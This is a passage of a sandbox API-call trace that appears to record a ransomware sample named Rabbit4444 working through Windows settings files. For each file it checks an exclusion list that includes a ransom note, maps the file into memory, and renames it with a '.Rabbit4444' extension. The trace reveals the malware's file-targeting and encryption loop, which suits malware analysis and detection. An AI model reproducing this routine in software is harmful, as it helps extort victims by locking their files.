"c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacywebcam.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPagePrivacyWebcam.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageprivacywebcam.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.844] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdff33b9, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xdff33b9, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x462, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms", cAlternateFileName="AAB4D2~1.SET")) returned 1 [0056.844] lstrcmpiW (lpString1="AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.844] lstrcmpiW (lpString1="AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.845] lstrcmpiW (lpString1="AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.845] lstrcmpiW (lpString1="AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms", lpString2=".") returned 1 [0056.845] lstrcmpiW (lpString1="AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms", lpString2="..") returned 1 [0056.845] lstrcmpiW (lpString1="AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms", lpString2="windows") returned -1 [0056.845] lstrcmpiW (lpString1="AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.845] lstrcmpiW (lpString1="AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.845] lstrcmpiW (lpString1="AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms", lpString2="boot") returned -1 [0056.845] lstrcmpiW (lpString1="AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.845] lstrcmpiW (lpString1="AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.845] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms" | out: lpString1="AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms") returned="AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms" [0056.845] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.845] lstrlenW (lpString="AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms") returned 57 [0056.845] lstrlenW (lpString="Rabbit4444") returned 10 [0056.845] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.845] lstrlenW (lpString=".dll") returned 4 [0056.845] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.845] lstrlenW (lpString=".lnk") returned 4 [0056.845] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.845] lstrlenW (lpString=".ini") returned 4 [0056.845] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.845] lstrlenW (lpString=".sys") returned 4 [0056.845] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.845] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagerestoredeveloperoptions.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.846] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.846] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14815647734) returned 1 [0056.846] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1122) returned 1 [0056.846] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0056.846] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0056.846] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x770, lpName=0x0) returned 0x298 [0056.847] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x770) returned 0x70000 [0056.849] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.849] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0056.849] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.849] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0056.849] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.849] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0056.849] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.849] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0056.849] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14815986372) returned 1 [0056.849] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0056.849] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0056.849] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.849] CloseHandle (hObject=0x298) returned 1 [0056.849] CloseHandle (hObject=0x278) returned 1 [0056.849] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms.Rabbit4444") returned 185 [0056.849] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagerestoredeveloperoptions.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageRestoreDeveloperOptions.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagerestoredeveloperoptions.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.850] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3ace52, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xe3ace52, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a9aeb1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageRestoreMusUpdate.settingcontent-ms", cAlternateFileName="AAD392~1.SET")) returned 1 [0056.850] lstrcmpiW (lpString1="AAA_SettingsPageRestoreMusUpdate.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.850] lstrcmpiW (lpString1="AAA_SettingsPageRestoreMusUpdate.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.850] lstrcmpiW (lpString1="AAA_SettingsPageRestoreMusUpdate.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.850] lstrcmpiW (lpString1="AAA_SettingsPageRestoreMusUpdate.settingcontent-ms", lpString2=".") returned 1 [0056.850] lstrcmpiW (lpString1="AAA_SettingsPageRestoreMusUpdate.settingcontent-ms", lpString2="..") returned 1 [0056.850] lstrcmpiW (lpString1="AAA_SettingsPageRestoreMusUpdate.settingcontent-ms", lpString2="windows") returned -1 [0056.850] lstrcmpiW (lpString1="AAA_SettingsPageRestoreMusUpdate.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.850] lstrcmpiW (lpString1="AAA_SettingsPageRestoreMusUpdate.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.850] lstrcmpiW (lpString1="AAA_SettingsPageRestoreMusUpdate.settingcontent-ms", lpString2="boot") returned -1 [0056.850] lstrcmpiW (lpString1="AAA_SettingsPageRestoreMusUpdate.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.850] lstrcmpiW (lpString1="AAA_SettingsPageRestoreMusUpdate.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.851] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageRestoreMusUpdate.settingcontent-ms" | out: lpString1="AAA_SettingsPageRestoreMusUpdate.settingcontent-ms") returned="AAA_SettingsPageRestoreMusUpdate.settingcontent-ms" [0056.851] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageRestoreMusUpdate.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.851] lstrlenW (lpString="AAA_SettingsPageRestoreMusUpdate.settingcontent-ms") returned 50 [0056.851] lstrlenW (lpString="Rabbit4444") returned 10 [0056.851] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.851] lstrlenW (lpString=".dll") returned 4 [0056.851] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.851] lstrlenW (lpString=".lnk") returned 4 [0056.851] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.851] lstrlenW (lpString=".ini") returned 4 [0056.851] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.851] lstrlenW (lpString=".sys") returned 4 [0056.851] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.851] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageRestoreMusUpdate.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagerestoremusupdate.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.852] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.852] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14816230824) returned 1 [0056.852] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1087) returned 1 [0056.852] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0056.852] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0056.852] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x740, lpName=0x0) returned 0x298 [0056.853] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x740) returned 0x70000 [0056.854] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.854] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0056.854] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.854] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0056.854] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.854] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0056.854] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.854] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0056.854] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14816491603) returned 1 [0056.854] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0056.854] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0056.854] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.854] CloseHandle (hObject=0x298) returned 1 [0056.855] CloseHandle (hObject=0x278) returned 1 [0056.855] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageRestoreMusUpdate.settingcontent-ms.Rabbit4444") returned 178 [0056.855] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageRestoreMusUpdate.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagerestoremusupdate.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageRestoreMusUpdate.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagerestoremusupdate.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.855] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8254cb, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xe8254cb, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageRestoreOneBackup.settingcontent-ms", cAlternateFileName="AAC14A~1.SET")) returned 1 [0056.855] lstrcmpiW (lpString1="AAA_SettingsPageRestoreOneBackup.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.855] lstrcmpiW (lpString1="AAA_SettingsPageRestoreOneBackup.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.855] lstrcmpiW (lpString1="AAA_SettingsPageRestoreOneBackup.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.855] lstrcmpiW (lpString1="AAA_SettingsPageRestoreOneBackup.settingcontent-ms", lpString2=".") returned 1 [0056.855] lstrcmpiW (lpString1="AAA_SettingsPageRestoreOneBackup.settingcontent-ms", lpString2="..") returned 1 [0056.855] lstrcmpiW (lpString1="AAA_SettingsPageRestoreOneBackup.settingcontent-ms", lpString2="windows") returned -1 [0056.855] lstrcmpiW (lpString1="AAA_SettingsPageRestoreOneBackup.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.855] lstrcmpiW (lpString1="AAA_SettingsPageRestoreOneBackup.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.856] lstrcmpiW (lpString1="AAA_SettingsPageRestoreOneBackup.settingcontent-ms", lpString2="boot") returned -1 [0056.856] lstrcmpiW (lpString1="AAA_SettingsPageRestoreOneBackup.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.856] lstrcmpiW (lpString1="AAA_SettingsPageRestoreOneBackup.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.856] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageRestoreOneBackup.settingcontent-ms" | out: lpString1="AAA_SettingsPageRestoreOneBackup.settingcontent-ms") returned="AAA_SettingsPageRestoreOneBackup.settingcontent-ms" [0056.856] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageRestoreOneBackup.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.856] lstrlenW (lpString="AAA_SettingsPageRestoreOneBackup.settingcontent-ms") returned 50 [0056.856] lstrlenW (lpString="Rabbit4444") returned 10 [0056.856] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.856] lstrlenW (lpString=".dll") returned 4 [0056.856] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.856] lstrlenW (lpString=".lnk") returned 4 [0056.856] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.856] lstrlenW (lpString=".ini") returned 4 [0056.856] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.856] lstrlenW (lpString=".sys") returned 4 [0056.856] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.856] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageRestoreOneBackup.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagerestoreonebackup.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.856] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.856] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14816722102) returned 1 [0056.857] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1087) returned 1 [0056.857] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0056.857] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0056.857] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x740, lpName=0x0) returned 0x298 [0056.858] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x740) returned 0x70000 [0056.858] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.859] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0056.859] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.859] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0056.859] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.859] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0056.859] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.859] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0056.859] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14816973692) returned 1 [0056.859] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0056.859] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0056.859] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.859] CloseHandle (hObject=0x298) returned 1 [0056.859] CloseHandle (hObject=0x278) returned 1 [0056.859] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageRestoreOneBackup.settingcontent-ms.Rabbit4444") returned 178 [0056.859] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageRestoreOneBackup.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagerestoreonebackup.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageRestoreOneBackup.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagerestoreonebackup.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.860] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee1b304, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xee1b304, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x435, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageRestoreRestore.settingcontent-ms", cAlternateFileName="AA489C~1.SET")) returned 1 [0056.860] lstrcmpiW (lpString1="AAA_SettingsPageRestoreRestore.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.860] lstrcmpiW (lpString1="AAA_SettingsPageRestoreRestore.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.860] lstrcmpiW (lpString1="AAA_SettingsPageRestoreRestore.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.860] lstrcmpiW (lpString1="AAA_SettingsPageRestoreRestore.settingcontent-ms", lpString2=".") returned 1 [0056.860] lstrcmpiW (lpString1="AAA_SettingsPageRestoreRestore.settingcontent-ms", lpString2="..") returned 1 [0056.860] lstrcmpiW (lpString1="AAA_SettingsPageRestoreRestore.settingcontent-ms", lpString2="windows") returned -1 [0056.860] lstrcmpiW (lpString1="AAA_SettingsPageRestoreRestore.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.860] lstrcmpiW (lpString1="AAA_SettingsPageRestoreRestore.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.860] lstrcmpiW (lpString1="AAA_SettingsPageRestoreRestore.settingcontent-ms", lpString2="boot") returned -1 [0056.860] lstrcmpiW (lpString1="AAA_SettingsPageRestoreRestore.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.860] lstrcmpiW (lpString1="AAA_SettingsPageRestoreRestore.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.860] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageRestoreRestore.settingcontent-ms" | out: lpString1="AAA_SettingsPageRestoreRestore.settingcontent-ms") returned="AAA_SettingsPageRestoreRestore.settingcontent-ms" [0056.860] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageRestoreRestore.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.861] lstrlenW (lpString="AAA_SettingsPageRestoreRestore.settingcontent-ms") returned 48 [0056.861] lstrlenW (lpString="Rabbit4444") returned 10 [0056.861] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.861] lstrlenW (lpString=".dll") returned 4 [0056.861] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.861] lstrlenW (lpString=".lnk") returned 4 [0056.861] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.861] lstrlenW (lpString=".ini") returned 4 [0056.861] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.861] lstrlenW (lpString=".sys") returned 4 [0056.861] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.861] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageRestoreRestore.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagerestorerestore.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.861] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.861] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14817206091) returned 1 [0056.861] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1077) returned 1 [0056.861] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0056.861] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0056.861] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x740, lpName=0x0) returned 0x298 [0056.864] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x740) returned 0x70000 [0056.864] RtlAllocateHeap 